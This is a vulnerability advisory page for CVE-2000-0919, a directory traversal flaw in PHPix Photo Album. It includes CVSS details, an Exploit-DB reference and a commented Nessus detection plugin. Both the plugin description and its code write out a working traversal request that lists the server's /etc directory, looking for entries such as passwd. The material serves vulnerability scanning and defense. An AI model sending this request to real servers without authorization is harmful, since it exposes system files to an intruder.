Vulnerabilities > CVE-2000-0919 - Unspecified vulnerability in PHPix 1.0/1.0.1/1.0.2

047910
CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
NONE
Availability impact
NONE
network
low complexity
phpix
nessus
exploit available

Summary

Directory traversal vulnerability in PHPix Photo Album 1.0.2 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) attack.

Vulnerable Configurations

Part Description Count
Application
Phpix
3

Exploit-Db

description: PHPix 1.0 Directory Traversal Vulnerability. CVE-2000-0919. Webapps exploit for php platform
id: EDB-ID:20278
last seen: 2016-02-02
modified: 2000-10-07
published: 2000-10-07
reporter: Synnergy.net
source: https://www.exploit-db.com/download/20278/
title: phpix 1.0 - Directory Traversal Vulnerability

Nessus

NASL family: CGI abuses
NASL id: PHPIX.NASL
description: The PHPix program allows an attacker to read arbitrary files on the remote web server by prefixing the pathname of the file with ..%2F..%2F.. For example: GET /Album/?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0 will return all the files that are nested within the /etc directory.
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 10574
published: 2000-12-11
reporter: This script is Copyright (C) 2000-2018 Zorgon <[email protected]>
source: https://www.tenable.com/plugins/nessus/10574
title: PHPix album Parameter Encoded Traversal Arbitrary File/Directory Access
code
#
# This script was written by Zorgon <[email protected]>
#
# See the Nessus Scripts License for details
#


include("compat.inc");

# Plugin registration: this branch runs only when `description` is set. It
# declares the plugin's identifiers, report text, CVSS vectors and scheduling
# hints, then exits so the detection code further down is not executed.
if(description)
{
 # Identifiers: plugin id, plugin revision, and the advisories this check maps to.
 script_id(10574);
 script_version ("1.25");
 script_cve_id("CVE-2000-0919");
 script_bugtraq_id(1773);
 
 script_name(english:"PHPix album Parameter Encoded Traversal Arbitrary File/Directory Access");
 
 # Report text attached to a finding: synopsis, description and solution.
 script_set_attribute(attribute:"synopsis", value:
"Arbitrary files can be read on the remote host." );
 script_set_attribute(attribute:"description", value:
"The PHPix program allows an attacker to read arbitrary files on the 
remote web server, prefixing the pathname of the file with ..%2F..%2F..

For example:

    GET /Album/?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0

will return all the files that are nested within /etc directory." );
 # NOTE(review): the solution text names no fixed release; whoever triages the
 # finding has to confirm the patched version with the vendor.
 script_set_attribute(attribute:"solution", value:
"Contact your vendor for the latest software release." );
 # CVSS v2 base vector: network reachable, low complexity, no authentication,
 # partial confidentiality impact, no integrity or availability impact.
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
 # NOTE(review): the temporal vector carries E:POC while "exploit_available"
 # below is set to "false" -- confirm which value is intended for prioritisation.
 script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
 script_set_attribute(attribute:"exploit_available", value:"false");

 # Publication and modification dates for the plugin and the vulnerability.
 script_set_attribute(attribute:"plugin_publication_date", value: "2000/12/11");
 script_set_attribute(attribute:"vuln_publication_date", value: "2000/10/07");
 script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/12");
# Plugin type and the CPE of the product the finding is attributed to.
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe",value:"cpe:/a:phpix:phpix");
script_end_attributes();

 
 # Scheduling hints: category, family, the plugin this one depends on, the
 # ports it requires, and the KB key that excludes it from a scan.
 script_summary(english:"PHPix directory traversal vulnerability");
 script_category(ACT_GATHER_INFO);
 script_copyright(english:"This script is Copyright (C) 2000-2020 Zorgon <[email protected]>");
 script_family(english:"CGI abuses");
 script_dependencie("http_version.nasl");
 script_require_ports("Services/www", 80);
 script_exclude_keys("Settings/disable_cgi_scanning");
 # Registration is complete; stop here so no request is sent in this mode.
 exit(0);
}

#
# The script code starts here
#

include("http_func.inc");
include("http_keepalive.inc");

# Detection: send the one fixed request from the plugin description to the web
# port and report the host when the reply looks like a listing of /etc.
port = get_http_port(default:80, embedded:TRUE);

if (get_port_state(port))
{
  # Only the hard-coded /Album/ location is checked; an installation under a
  # different path is not covered by this plugin.
  # For log review: this request line is recognisable by an `album=` value
  # made of repeated URL-encoded "..%2F" sequences.
  probe_url = string("/Album/?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0");
  request   = http_get(item:probe_url, port:port);
  response  = http_keepalive_send_recv(port:port, data:request);

  # All three markers must be present: the "Prev 20" text plus the names
  # "group" and "passwd".
  # NOTE(review): these are plain substring matches anywhere in the reply, so an
  # unrelated page containing all three strings would also be reported --
  # confirm a finding manually before acting on it.
  if (("Prev 20" >< response) && ("group" >< response) && ("passwd" >< response))
    security_warning(port);
}